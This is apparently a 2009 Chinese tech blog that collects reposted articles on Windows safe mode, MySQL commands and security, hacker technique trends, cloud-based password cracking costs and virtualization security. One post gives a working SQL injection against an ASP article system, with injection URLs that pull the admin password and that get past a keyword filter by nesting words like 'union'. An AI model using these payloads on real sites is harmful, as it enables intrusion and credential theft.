♀10點10分♂

Windows安全模式的五项重要用途

568084439@qq.com(♀10點10分♂) — Sun, 15 Nov 2009 11:28:31 GMT

　对于Windows操作系统的安全模式，经常使用电脑的朋友肯定不会感到陌生，安全模式是Windows用于修复操作系统错误的专用模式，是一种不加载任何驱动的最小系统环境，用安全模式启动电脑，可以方便用户排除问题，修复错误，这也是方便大家对用户解释安全模式意义。
　　进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放) ，在出现的启动选项菜单中，选择"Safe Mode"，即可以安全模式启动计算机。那么安全模式到底有哪些用途呢？下面就让我们具体来看一下。
　　1、修复系统故障
　　如果Windows运行起来不太稳定或者无法正常启动，这时候先不要忙着重装系统，试着重新启动计算机并切换到安全模式启动，之后再重新启动计算机，系统是不是已经恢复正常了？如果是由于注册表有问题而引起的系统故障，此方法非常有效，因为Windows在安全模式下启动时可以自动修复注册表问题，在安全模式下启动Windows成功后，一般就可以在正常模式(Normal)下启动了。
　　2、恢复系统设置
　　如果用户是在安装了新的软件或者更改了某些设置后，导致系统无法正常启动，也需要进入安全模式下解决，如果是安装了新软件引起的，请在安全模式中卸载该软件，如果是更改了某些设置，比如显示分辨率设置超出显示器显示范围，导致了黑屏，那么进入安全模式后就可以改变回来，还有把带有密码的屏幕保护程序放在"启动"菜单中，忘记密码后，导致无法正常操作该计算机，也可以进入安全模式更改。
　　3、删除顽固文件
　　我们在Windows下删除一些文件或者清除回收站内容时，系统有时候会提示"某某某文件正在被使用，无法删除"的字样，有意思的是，通常这些文件并没有正在被使用，那么是不是让这些文件永远霸占我们的硬盘呢？请不要着急，重新启动计算机，并在启动时按下F8键进入安全模式，试着删除那些顽固文件并清空回收站看一看，没了！原来Windows已经放弃了对这些文件的保护，可以把它们删除了。
　　4、彻底清除病毒
　　现在病毒一天比一天多，杀毒软件也跟着天天更新。但是，在Windows正常模式下有时候并不能干净彻底地清除病毒，因为它们极有可能会交叉感染，而一些杀毒程序又无法在DOS下运行，这时候我们当然也可以把系统启动至安全模式，使 Windows只加载最基本的驱动程序，这样杀起病毒来就更彻底、更干净了。
　　5、磁盘碎片整理
　　在碎片整理的过程中，是不能运行其它程序的，因为每当其它程序进行磁盘读写操作时，碎片整理程序就会自动重新开始，而一般在正常启动Windows时，系统会加载一些自动启动的程序，有时这些程序又不易手动关闭，常常会对碎片整理程序造成干扰，这种情况下，我们就应该重新启动计算机，进入安全模式，安全模式是不会启动任何自动启动程序的，可以保证磁盘碎片整理的顺利进行。

09年脚本漏洞总结

568084439@qq.com(♀10點10分♂) — Sat, 14 Nov 2009 13:47:27 GMT

09年脚本漏洞总结
幻泉
继07年的搜索注入和08年的cookies注入后，09年的脚本漏洞有什么新的变化呢？各位看官请随笔者一起来分析一下吧。
案例1：防注入代码不防注入
这里我们利用老y系统来说明问题。漏洞出现在js.asp文件中。

If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1，与数组2进行整形过滤。这里没有漏洞
End if
num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
If NclassID<>"" and NclassID1="" then
If Yao_MyID(NclassID)="0" then
SQL=SQL&" and ClassID="&NclassID&""
else
MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")" ‘in(1,2,3)
End if
elseif NclassID<>"" and NclassID1<>"" then
MyID = Replace(""&Request("ClassNo")&"","|",",") ‘把所有的|过滤为, 1|1|2|2|2 myid=1,1,2,2,2
SQL=SQL&" and ClassID in ("&MyID&")" ‘in(1,1,2) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1)
'这里出现的问题classno并没做其他过滤就写入到查询
End if

select case topType
case "new" sql=sql&" order by DateAndTime desc,ID desc"
case "hot" sql=sql&" order by hits desc,ID desc"
case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select
set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"

........

这里代码都做了注解，主要就是因为只对ClassNo做了checkStr过滤并且把“|”转换成“，”。这里我们看下他的过滤先后顺序，以后要用到。第一次过滤用的是CherckStr函数过滤，然后再用replace把“|”转换为“，”。继续看CheckStr函数代码

function CheckStr(str)
CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function

这里仅仅把一些常用的过滤为空。接下来我们就可以构造注射代码了。我当时已经给出获取密码的注射代码

js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1

（由于老代码已经失去了，所以没办法抓图，我再次看发现老代码也对select进行过滤，但是checkstr应该没起作用。）
好了，之前的漏洞说完了，我们再看他新的修补方式。Js.asp没改变，只改变了过滤函数。如下代码：
#333333; PADDING-TOP: 5px; BORDER-BOTTOM: #cccccc 2px dotted; BACKGROUND-COLOR: #f2f2f2; WORD-WRAP: break-word; text-algin: left"> function CheckStr(str)
CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
CheckStr=replace(replace(replace(replace(CheckStr,"*",""),"=",""),"mid",""),"count","")
CheckStr=replace(replace(replace(replace(CheckStr,"%",""),",",""),"union",""),"where","")
end function

这里增加了过滤内容，最主要的是吧之前的“，”过滤掉了，还有union联合查询等等。既然知道了他如何修补的那么我们就开始进行突破吧。首先得跟大家说下replace的过滤过程，假设我们现在有个字符串为“123unionunion”这样的一串字符串而过滤函数我们简写成CheckStr=replace(CheckStr,”union”,””)。以下是测试代码

<%
Function CheckStr(str)
CheckStr=replace(Str,"union","")
end Function
a = Request("a")
response.write "未过滤字符串是：" & a & "
"
a = CheckStr(a)
response.write "过滤后字符串是：" & a
%>

当字符串被过滤的时候replace就会检查是否有与union匹配的字符串，如果有则过滤为空，那么我们的字符串最后就剩下“123”。这样过滤就成功阻止了sql语句的代码


但是如果我们用“123ununionion”这样的字符串呢？当字符串被过滤的时候replace会把匹配的union过滤掉然后进入下一个执行代码。这样我们刚才的字符串被过滤后就会变成“123union”这样的一个字符串，虽然过滤了中间包含的union但是我们精心构造代码的却因为他过滤为空导致被剩下，这样就绕过了他的防注入防线。

虽然第一步是绕过了但是路还是很长，像“，”这样的一个字符中间是没办法加其他字符的所以需要想其他方式绕过。这就需要利用上面我所强调的代码了。ClassNo最后还经过一个Replace(SQL,"|",",")过滤。上面js.asp代码做了注解，ClassNo是以数组获取过来的，作者利用了split(CheckStr(Request("ClassNo")),"|")进行数组分段。那么我们如果是写的是“|”最后sql显示的是什么呢？

我在源代码加入如上代码为了让sql语句显示。

看到了把，当我们写入“|”的时候他导入到sql就变成了，就是上面的Replace(SQL,"|",",")立功了。
好了现在主要内容都做了绕过我们再测试下吧。
http://localhost/js.asp?num=1&ClassNo=1|1|1)%20unwhereion%20selewherect%201|admin_pass|3|4|5|6|7|8|9%20from%20yao_admin%20wherwheree%20id%20in(1

跟我们所想的一样，但是空格被过滤导致代码没被执行。那么我们继续突破吧。前人给总结过关于绕过过滤空格执行sql的方法。但对于access数据库来说我们回车的ascii码（%0D%0A%0D%0A）来绕过。

看到了把，绕过了他防注入代码获取到了我们需要的管理员密码。

Mysql数据库常用命令

568084439@qq.com(♀10點10分♂) — Sun, 08 Nov 2009 14:28:27 GMT

Mysql数据库常用命令：
启动Mysql数据库
C：》cd Mysql5.0 bin
C:Mysql5.0 bin》mysqld –install 安装Mysql服务
C:Mysql5.0 bin》net start mysql 启动Mysql服务
请求的服务已经启动。
连接mysql
用户须要提供Mysql的用户名和密码来连接服务器，要是服务器不是在本机，则还须要一个主机名或IP来指定服务器的位子。
C:Mysql5.0 bin》mysql -h localhost -u root -p
Enter passWord： ****
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 6 to server version： 5.0.18-nt
Type ‘help;’ or ‘h’ for help. Type ‘c’ to clear the buffer.
mysql》
使用一条简单的查询语句
mysql》 select version（），current_date;
mysql》 select version（）;select now（）;
新建或删除一个数据库
Mysql》create database mydb;
Mysql》 drop database mydb;
打开的数据库的命令
mysql》 use mysql
Database changed
察看数据库的命令
mysql》 show databases;
查看数据表的详尽结构
mysql》 desc func;
新建数据库
mysql》 create database school;
Query OK， 1 row affected （0.00 sec）
新建表
mysql》 create table user01（
-》 id varchar（20） NOT NULL，
-》 userName varchar（10） NOT NULL，
-》 age int（11） default‘0’，
-》 sex char（2） NOT NULL default‘m’，
-》 PRIMARY KEY （id）
-》）TYPE=InnoDB;
Query OK， 0 rows affected， 1 warning （0.02 sec）mysql》desc student;
插入和删除表中的数据
Create table student（stuName varchar（20），age varchar（20），id varchar（20），set0 char（1））;
插入
mysql》 insert into student（id，stuName） values（‘1’，‘tomcat’）;
Query OK， 1 row affected （0.00 sec）
删除
mysql》 delete from student where id=‘1’;
Query OK， 1 row affected （0.01 sec）
删除表中所有数据
mysql》 truncate table student;
Query OK， 1 row affected （0.01 sec）
删除表
mysql》 create table temp（t varchar（1））;
Query OK， 0 rows affected （0.00 sec）
mysql》 drop table temp;
Query OK， 0 rows affected （0.00 sec）
创建新用户并给予权限
mysql》 grant all privileges on *.* to [email=dbuser@localhost]dbuser@localhost[/email] identified by ‘1234’
with grant option;
更改Mysql用户密码
c:Mysql5.0 bin》mysqladmin -u root -p password 1234
Enter password： ****
备份数据库及表
我们用mysqldump命令来备份数据库
c:mysql bin》mysqldump –u root –p 3306 mysql》d： backup.sql
执行此语句将把mydb 备份到D盘的backup.sql文件中
备份多个数据库表
c:mysql bin》mysqldump –u root –p 3306 school user01 user 》d： backup.sql
此句的意思是把school库中的user01表和user表的内容和表的定义备份到D盘backup.sql文件中。
备份所有的数据库
c:myql bin》mysqldump –u root –p 3306 –all –database》d:backup.sql
还原Mysql数据库
c:mysql bin mysql –u root –p 3306 school
还原其中的一个表
mysql》 source d:books.sql;
ERROR：
Unknown command ‘b’。
Query OK， 0 rows affected （0.00 sec）
Query OK， 1 row affected （0.00 sec）
退出Mysql联接
mysql》quit（exit）
关闭mysql服务
C:mysql bin》net mysql

MySQL的一些安全注意点

568084439@qq.com(♀10點10分♂) — Sun, 08 Nov 2009 14:27:45 GMT

1.如果客户端和服务器端的连接需要跨越并通过不可信任的网络，那么就需要使用SSH隧道来加密该连接的通信。
2.用set password语句来修改用户的密码，三个步骤 “先mysql -u root登陆数据库系统” 然后“mysql> update mysql.user set password=password('newpwd')” 最后执行“flush privileges”就可以了。
3.需要提防的攻击有，防偷听、篡改、回放、拒绝服务等，不涉及可用性和容错方面。对所有的连接、查询、其他操作使用基于ACL即访问控制列表的安全措施来完成。也有一些对SSL连接的支持。
4.除了root用户外的其他任何用户不允许访问mysql主数据库中的user表；
加密后存放在user表中的加密后的用户密码一旦泄露，其他人可以随意用该用户名/密码相应的数据库；
5.用grant和revoke语句来进行用户访问控制的工作；
6.不使用明文密码，而是使用md5()和sha1()等单向的哈系函数来设置密码；
7.不选用字典中的字来做密码；
8.采用防火墙来去掉50%的外部危险，让数据库系统躲在防火墙后面工作，或放置在DMZ区域中；
9.从因特网上用nmap来扫描3306端口，也可用telnet server_host 3306的方法测试，不能允许从非信任网络中访问数据库服务器的3306号TCP端口，因此需要在防火墙或路由器上做设定；
10.为了防止被恶意传入非法参数，例如where ID=234，别人却输入where ID=234 OR 1=1导致全部显示，所以在web的表单中使用''或""来用字符串，在动态URL中加入%22代表双引号、%23代表井号、%27代表单引号；传递未检查过的值给mysql数据库是非常危险的；
11.在传递数据给mysql时检查一下大小；
12.应用程序需要连接到数据库应该使用一般的用户帐号，只开放少数必要的权限给该用户；
13.在各编程接口(C C++ PHP Perl Java JDBC等)中使用特定‘逃脱字符’函数；
在因特网上使用mysql数据库时一定少用传输明文的数据，而用SSL和SSH的加密方式数据来传输；
14.学会使用tcpdump和strings工具来查看传输数据的安全性，例如tcpdump -l -i eth0 -w -src or dst port 3306 | strings。以普通用户来启动mysql数据库服务；
15.不使用到表的联结符号，选用的参数 --skip-symbolic-links；
16.确信在mysql目录中只有启动数据库服务的用户才可以对文件有读和写的权限；
17.不许将process或super权限付给非管理用户，该mysqladmin processlist可以列举出当前执行的查询文本；super权限可用于切断客户端连接、改变服务器运行参数状态、控制拷贝复制数据库的服务器；
18.file权限不付给管理员以外的用户，防止出现load data '/etc/passwd'到表中再用select 显示出来的问题；
19.如果不相信DNS服务公司的服务，可以在主机名称允许表中只设置IP数字地址；
20.使用max_user_connections变量来使mysqld服务进程，对一个指定帐户限定连接数；
21.grant语句也支持资源控制选项；
22.启动mysqld服务进程的安全选项开关，--local-infile=0或1 若是0则客户端程序就无法使用local load data了，赋权的一个例子grant insert(user) on mysql.user to [email='user_name'@'host_name']'user_name'@'host_name'[/email]; 若使用--skip-grant-tables系统将对任何用户的访问不做任何访问控制，但可以用mysqladmin flush-privileges或mysqladmin reload来开启访问控制；默认情况是show databases语句对所有用户开放，可以用--skip-show-databases来关闭掉。
23.碰到Error 1045(28000) Access Denied for user [email='root'@'localhost']'root'@'localhost'[/email] (Using password:NO)错误时，你需要重新设置密码，具体方法是：先用--skip-grant-tables参数启动mysqld，然后执行 mysql -u root mysql,mysql>update user set password=password('newpassword') where user='root';mysql>Flush privileges;，最后重新启动mysql就可以了。

八大黑客攻击技术动态

568084439@qq.com(♀10點10分♂) — Fri, 06 Nov 2009 13:35:47 GMT

电子商务和电子政务迅猛发展，黑客攻击的频率和强度有增无减。今天我们所面临的网络威胁，早已不仅仅是早期出现的那些攻击手段，如病毒、木马、间谍软件与网络监听、口令攻击、漏洞攻击等。黑客攻击技术近年来的最新动态是什么？
　　硬件安全
　　利用硬件的黑客技术虽然报道不多，但它的的确确出现了：在BIOS芯片中植入病毒木马，让目前的防火墙、防毒软件都失效; 针对主机板上的电磁辐射进行信息获取的技术……仅仅使用软件非法侵入的方式可能已经落伍，新时期的黑客技术应包括破解硬件本身。前几年微软公司曾经对硬件黑客侵犯其Xbox设备的行为采取法律与技术措施。索尼公司的PS2游戏机也成为一些专门修改芯片的黑客目标，其核心技术Sony的记忆棒被破解。美国苹果公司新推出的iPhone 3Gs的加密系统也被硬件黑客破解，造成磁盘文件数据可以被实时偷走。
　　逆向工程
　　逆向工程是指对软件执行码直接进行分析，可被看做是“开发周期的逆行”。实际应用中逆向工程主要分成两种情况：第一种，软件的源代码可用，但描述文档不再适用或者丢失；第二种，软件没有可用的源代码，任何能找到它的源代码的努力都被称为逆向工程。软件的逆向工程实现方法有：通过观察信息交换进行分析、使用反汇编器进行反汇编和使用反编译器进行反编译等。黑客则利用反逆向工程的方法保护自己的恶意代码。
　　社会工程学
　　社会工程学定位在计算机信息安全工作链的一个最脆弱的环节，即“人”这个环节上。“人”这个环节在整个信息安全体系中是非常重要的，这一点信息安全的脆弱性是普遍存在的，它不会因为系统平台、软件、网络或者是设备的新旧等因素不相同而有所差异。无论是在物理上，还是在虚拟的信息系统上，任何一个可以访问系统某个部分的人都有可能构成潜在的安全风险与威胁。任何细微的信息都可能会被黑客用做“补给资料”来运用，使其得到其他的信息。
　　0day
　　在计算机领域中，0day通常是指没有公布补丁的漏洞，或者是还没有被漏洞发现者公布出来的漏洞利用工具。一般，带有0day名字的黑客软件指的是软件公布时对应的漏洞还没有打补丁。0day漏洞的利用程序对于网络安全具有巨大威胁，因此0day不但是黑客的最爱，掌握多少0day也成为评价黑客技术水平的一个重要参数。
　　Rootkit
　　Rootkit已被大多数的防毒软件归类为具危害性的恶意软件。Rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，或者首先采用密码猜测或者密码强制破译的方式获得系统的访问权限，进入系统后，再通过某些安全漏洞获得系统的root权限。攻击者会在侵入的主机中安装rootkit，并经常通过rootkit的后门来检查系统是否有其他的用户登录，如果只有攻击者登录，攻击者就开始着手清理日志中的有关信息。攻击者通过rootkit的嗅探器获得其他系统的用户和密码之后，就会利用这些信息侵入其他的系统。
　　痕迹销毁
　　与反取证
　　计算机取证将犯罪者留在计算机中的“痕迹”作为证据提供给法庭。可以用做计算机取证的信息源很多，如系统日志、防火墙与入侵检测系统的工作记录、反病毒软件日志、系统审计记录、网络监控流量、电子邮件、操作系统文件、数据库文件和操作记录、硬盘交换分区、软件设置参数和文件、完成特定功能的脚本文件、Web浏览器数据缓冲、书签、历史记录或会话日志、实时聊天记录等。随着计算机取证技术的发展和取证工具的广泛使用，黑客在入侵过程中越来越多地使用痕迹销毁技术和反取证技术，以对抗调查人员的取证分析。因此，取证与反取证往往形成矛与盾的关系，成为黑客攻击技术与反黑客技术较量的技术制高点之一。
　　利用虚拟机
　　实施攻击
　　近些年更多的攻击者倾向于在虚拟机环境中进行攻击，这是由于虚拟机可模拟多种系统平台，造成了攻击主机系统与位置的隐蔽性。黑客可通过快速卸载或简单删除等方式来逃避一般的搜查追踪。当前各黑客网站都有虚拟机安装和使用的详细教学资料，并且认为虚拟机相关知识是黑客重要的基本知识之一。因此，今后一旦发生类似于“熊猫烧香”事件时，黑客完全可能改用虚拟机作案，然后立即关闭虚拟机系统并删除该虚拟机文件夹。调查人员必须首先发现该机器上的虚拟机痕迹，再从中寻找黑客制造病毒并进行传播的证据，这项工作往往变得异常复杂，需要特殊的技术和工具。
　　无线入侵
　　无线通信包括手机、卫星电视、无线局域网、无线传感网络、红外、蓝牙、RFID等，它们在人们的日常工作生活中扮演着越来越重要的角色。无线通信在给人们带来很大便利的同时，也带来了很多安全隐患：一方面，针对无线通信的窃听和恶意代码能获取用户的通信内容、侵犯用户的隐私权; 另一方面，入侵者可以通过这些无线通信技术，进一步接入网络的核心部分。无线通信极大扩展了网络的边界，使得网络接入的控制变得复杂起来，黑客通过无线入侵往往能起到事半功倍的效果。
　　无锡石中剑国际网络高峰论坛将召开
　　为了遏制日益扩张的黑客经济产业链的恶性发展，推动我国网络高手与国际同行的直接交流，由民间发起、无锡高科技园区支持的（无锡）石中剑国际网络高峰论坛将于今年11月6～8日在江苏无锡召开。会议为期三天，将有国内外特邀高手的精彩演讲与讨论、专题分组研讨和比赛交流等各种形式的活动。本次活动的国外特邀嘉宾很多都是经常出入黑帽大会的常客，下面先简要做一些介绍：
　　Jayson E. Street，2006年度《时代周刊》提名人物，，现任美国顶级安全学院（SANS学院）顾问；
　　Joe McCray，在美国几所知名大学任教，同时开设自己的安全培训班；
　　Iftach Ian Amit，原来在Finjan安全公司工作，从事研究和项目开发十几年，对全球IT地下产业犯罪有专门的深入研究;
　　Jordan Wiens，DEFCON黑客大会夺旗比赛冠军；
　　来自英国的Adam Laurie，无线技术牛人，使用一部诺基亚手机、一台笔记本电脑，仅用12分钟就破解了英国的新身份证；
　　Mohammad Hluchan，语言天才，可以说八种语言、写五种语言，关注网络恐怖和极端势力研究。
　　巴西黑客Rodrigo Branco，可以搞高难度的负载均衡攻防；
　　Steve Topletz，严肃的律师、优雅的艺术家，同时具有黑客的身份。

黑客开始利用云计算服务暴力破解密码

568084439@qq.com(♀10點10分♂) — Wed, 04 Nov 2009 13:02:15 GMT

使用云计算服务来替代在公司里设立维护大量服务器，显然对节省企业的成本有利。不过现在看来从云计算服务中受惠最大的恐怕是黑客等群体，黑客们开始利用亚马逊EC2等云计算服务来暴力破解并窃取用户信用卡密码。不过据安全专家David Campbell的计算，即便用户不使用安全专家建议的大小写字母混合式的密码组合，使用亚马逊提供的云计算服务进行密码暴力破解的黑客，出于成本过高的原因可能也将无法使用这种服务对具备12位长度的密码进行破解。
　　目前，亚马逊公司为用户提供一种名为EC2的云计算网络服务，这种服务按小时计费.而如果要利用这种服务来暴力破解长度为12位的密码，黑客需要为此支付150万美元以上金额的服务费。不过如果密码的长度缩短为11位，那么便只需要不到6万美元服务费即可，而10位密码则需要支付不到2300美元的费用。
　　按照传统的安全建议，在密码中采用大小写字母混搭的形式更为安全一些，但根据最近的研究，其提升的安全等级并不如我们所想像得那么大，而密码的位数对密码安全性的提升作用则更大一些。采用这种混搭形式的10位密码只需要支付不到6万美元的服务费，便可以利用EC2云计算服务暴力破解成功。而11位这样的密码则需要花费210万美元。而如果密码的长度较短，即使用户在设置密码时采用诸如[email=“!@#$%]“!@#$%[/email]”这类生僻字符，暴力破解密码同样比较容易。采用EC2计算8位长度的这种密码的费用大约是10.6万美元左右。
　　这篇分析文章的全文可以点击这个链接进行查阅。这篇文章以今年早些时候SensePost的安全顾问Haroon Meer在“黑帽”大会上所作的研究报告为基础。在这篇文章中，Campbell向我们介绍了一种利用亚马逊EC2云计算服务来暴力破解并窃取用户信用卡密码的方法。
　　“由于黑帽组织已经开始利用云计算等超级计算服务开展破解行动，因此我们这批负责安全管理的技术人员需要重新考虑一些过去被我们忽视的安全细节。黑客们窃取了用户的信用卡后，可以利用这些卡里的钱来购买计算能力强劲的机器，这些机器的威力甚至比国家安全机关中装备的超级计算机还强。”
　　尽管亚马逊向单独一名用户提供的云计算服务计算能力有限，但黑客们也有对应的办法，他们可以利用窃取的多个信用卡账号同时登陆云计算服务，让这些计算同时进行。
　　Cambell在这次的假设中采用了一种很简单的算法：
　　在计算暴力破解由8位全小写字母组成的密码的费用时，他简单地将暴力破解的次数设为26的8次方,这样，加上大写字母以及10个阿拉伯数字后，暴力破解的次数则变为（26+26+10）的8次方。而他的密码破解软件则每个小时可以暴力计算出93.6亿个密码，将62的8次方除以93.6亿，然后再乘以EC2服务的服务费，每小时30美分，这样暴力破解8位全小写字母密码的费用计算式便为：((26+26+10)^8/ 9,360,000,000) * .30.
　　而暴力破解由12位大小写字母+阿拉伯数字组成密码所需的费用则为((26+26+10)^12 / 9,360,000,000) * .30
　　使用云计算服务来替代在公司里设立维护大量服务器，显然对节省企业的成本有利。不过现在看来从云计算服务中受惠最大的恐怕是黑客等群体。
　　不久以前，安全专家还对102位的RSA密码长度刚到放心。但随着电脑技术的发展，现在愿意使用2048位密码长度的安全专家数量也越来越多。而现在云计算也开始加入到为密码破解技术提供服务的阵营中去，是时候对一些传统的安全措施进行重新考虑和修改了。

五大策略解除服务器虚拟化安全隐患

568084439@qq.com(♀10點10分♂) — Wed, 04 Nov 2009 13:00:46 GMT

服务器虚拟化正在推动着当前的数据中心改造。这种技术提高了可用性，减少IT成本和支持未来的业务增长。服务器虚拟化能够让机构更好地准备好应对更广泛的云计算机会和基于服务的计算机会。在降低成本的同时提高效率的需求正在推动虚拟化技术的迅速应用。
　　
　　在不确定的经济情况下，服务器虚拟化仍在继续增长。然而，虚拟化的快速应用能够引起颠覆性的特征(也就是说完全改造的基础设施和提供新的模式)，改变数据中心自然的秩序和引起安全问题。
　　
　　企业保护自己的虚拟服务器环境的安全是非常重要的，特别是虚拟化不仅已经在服务器中更普遍的应用，而且在存储、操作系统、台式电脑和网络资源等方面也在广泛应用。下面看一下机构担心的虚拟服务安全的主要问题，以及如何更好地控制这些问题，同时为虚拟化进一步向数据中心普及做好准备。
　　
　　解除服务器虚拟化安全隐患之管理、责任和政策
　　
　　管理虚拟化的主要问题是谁负责虚拟资源。与物理服务器不同，物理服务器由在这个物理区域的管理员直接负责，虚拟服务器的责任通常是不明确的。当涉及到虚拟化的时候，会出现如下问题：谁负责、谁应该拥有访问权、谁应该配置和保证这个环境的安全?这个责任是应该由业务部门、服务器管理员还是一个集中的主管理员负责?
　　
　　当设法解决这些问题时，遵循的一个简单的规则是对待重要的虚拟服务器应该像对待物理服务器一样采取同样的控制措施。例如，如果你没有把你的SAP服务器的根口令提供给主要管理员以外的其他人，对于你的虚拟SAP服务器也要制定同样的规则。
　　
　　应用安全虚拟解决方案定义和管理整个新的环境中的政策。当遇到虚拟安全的问题时，IT管理员需要制定正确的政策安全地保护自己的系统。然而，这些政策必须足够灵活以保证它们没有太多的限制。IT管理员需要询问使用当前的安全政策是否可以实现服务器虚拟化的全部好处。一个理想的解决方案是通过保证虚拟化不绕过现有的安全控制措施让用户保持对自己的基础设施的控制。这需要高水平的集中批准和控制。
　　
　　解除服务器虚拟化安全隐患之遵守法规
　　
　　随着一些虚拟服务器变成拥有极少控制的看不见的网络，就会出现遵守法规的问题。对于没有专门负责监视每一台主机内部虚拟机的全部互动情况的数据中心管理员来说，这是很成问题的。随着虚拟化继续向主流应用发展，有许多遵守法规的强制规定将不可避免地影响到虚拟化的应用。
　　
　　在零售行业，定义信用卡处理的规定(PCI-DSS要求2.2.1)要求企业每台服务器仅执行一项功能。这使人们对这个规定有许多解释。有些零售商也许把这个规定解释为每台物理服务器仅执行一项任务。有些企业仅把这项规定严格地限制在部署虚拟服务器方面。由于标准含糊不清，单个的企业正在采取不同的方式使用虚拟化技术处理信用卡信息。这会暴露持卡人的数据和没有使用新的行业规定遵守法规，从而引起企业的风险。使用一个有经验的综合者解决这个问题。PCI安全标准委员会最近恢复了一个特别兴趣组，以澄清审计人员和用户在虚拟化方面遇到的一些问题。这个兴趣组将在2009年年底之前提供第一轮建议。
　　
　　在处理服务器虚拟化的遵守法规的问题，企业需要理解自己的风险。建立一个安全的审计跟踪作为遵守内部和外部审计者规定的证明，实时报警和联合流程仍是虚拟环境优先考虑的事情。如果一家公司能够现实地处理自己的风险，它就很容易解决审计者担心的问题并且保证能够修复任何问题。
　　
　　随着他们允许机构保持老式的服务、操作系统和应用程序，同时继续推进数据中心优化的努力，虚拟机将更加流行。因此，没有一个管理这些老式系统的撤销过程的明确的计划，就会存在风险并且会给企业带来新的重大安全风险。有一种推测认为，老式系统中使用的安全措施能够在虚拟化环境中提供同样的安全保护。企业把老式的安全措施当作安全系统是不安全的，不会以同样的方式发挥作用，从而使企业容易遭到安全攻击。
　　
　　解除服务器虚拟化安全隐患之保证虚拟化安全并监视虚拟化
　　
　　把服务器虚拟化推广到生产环境的一个重要挑战是保证平台的安全并且进行监视以便解决安全漏洞。与在裸机上运行的操作系统/应用程序不同，在一个虚拟化平台上运行的虚拟机是这个系统的活动部件。虚拟机管理员能够复制和把虚拟机镜像从一台服务器迁移到另一台服务器，在迁移中携带那个虚拟机、操作系统和支持的应用程序等全部内容。IT部门还能够在运行状态暂停、拷贝和把虚拟机从一台服务器迁移到另一台服务器。
　　
　　当然，这种灵活性还会产生安全漏洞。随着虚拟机的不断的上线和下线，或者根据需要从一台服务器迁移到另一台服务器，安全控制措施需要反映这些变化。此外，随着虚拟机从一台服务器迁移到另一台服务器，这些虚拟机也许会为传统的防火墙检测不到的危险和攻击敞开大门。处理这种安全漏洞的一个理想的方法是利用高级记录事件管理技术。这使企业能够监视各种虚拟化基础设施组件以便检测虚拟化平台中将发生什么事情。这包括监视具体的事件、失败的登录和其它可以认为是违法政策的活动。这种技术还能够让机构详细地理解有权限的用户能够对单个虚拟机做什么。
　　
　　由于虚拟机的设置和运行时间都比传统的物理服务器更短暂，这将引起额外的担心。这产生了一些风险情况。在这种情况中，虚拟机不可能上线进行安全扫描、升级和使用补丁。当发生故障的时候，找到故障原因也是很困难的，因为虚拟机不断地建立和撤销，快照和检查点经常退回重来。机构部署目前可用的软件管理解决方案管理离线虚拟机和物理服务器以避开这些安全问题是非常重要的。
　　
　　由于数据中心的虚拟机数量比物理服务器的数量多，保证这些虚拟机避免遭到病毒攻击是比较复杂的。由于虚拟机数量更多，病毒能够成倍地传播，攻击的服务器数量要把纯物理服务器环境中攻击的服务器数量多。传统的网络管理工具看不到虚拟机与虚拟机之间的通讯。要在这种情况下提供帮助，不同物理服务器上的虚拟机池需要在自己的专用网络上相互沟通，能够完全访问共同身份识别和加密等安全功能。
　　
　　虚拟机镜像将保留在文件中。结果，由于这些文件很容易复制，这就增加了风险。有一些可用的选择可以管理这些特殊问题。虚拟机镜像本身中的秘密数据不应该轻松地访问。最起码的是企业应该加密这些数据或者把这些数据存储到其它的存储位置(这可以是虚拟的或者物理的)。此外，加强管理来自网络的虚拟机镜像能够更严格进行控制，保证最低限度地访问这些镜像和增加身份识别。
　　
　　解除服务器虚拟化安全隐患之虚拟机蔓延和移动
　　
　　许多企业日益担心虚拟机蔓延问题。除了日益增加的管理复杂性和日益提高的数据中心成本之外，人们还日益担心缺少可用的控制措施避免业务部门经理自己创新大量新的虚拟服务器。使这种担心更加严重的是这些新的服务器也许是在没有保证适当管理和安全的情况下创建的。
　　
　　与虚拟机蔓延和轻松地在物理服务器之间迁移虚拟机有关的一个重要问题是支持环境的可持续性。这个主要问题是不同的虚拟机工作量通常有不同的与存储、计算和网络有关的要求。控制这个风险需要明确地关联虚拟机工作量和适当的要素分类，以及确保维持必要的安全态势。
　　
　　当考察软件管理解决方案的时候，企业有必要评估他们支持基于政策的向这个环境动态分配虚拟机的能力。这种能力通常称作“沙箱”。沙箱是隔离运行的应用程序的一种安全机制。沙箱经常用来执行没有经过测试的代码或者没有经过验证的第三方、供应商或用户的应用程序。这种方法通过阻止应用程序向沙箱外部写数据的方法来保证应用程序的安全，阻止进入系统的病毒和其它恶意活动进行破坏。
　　
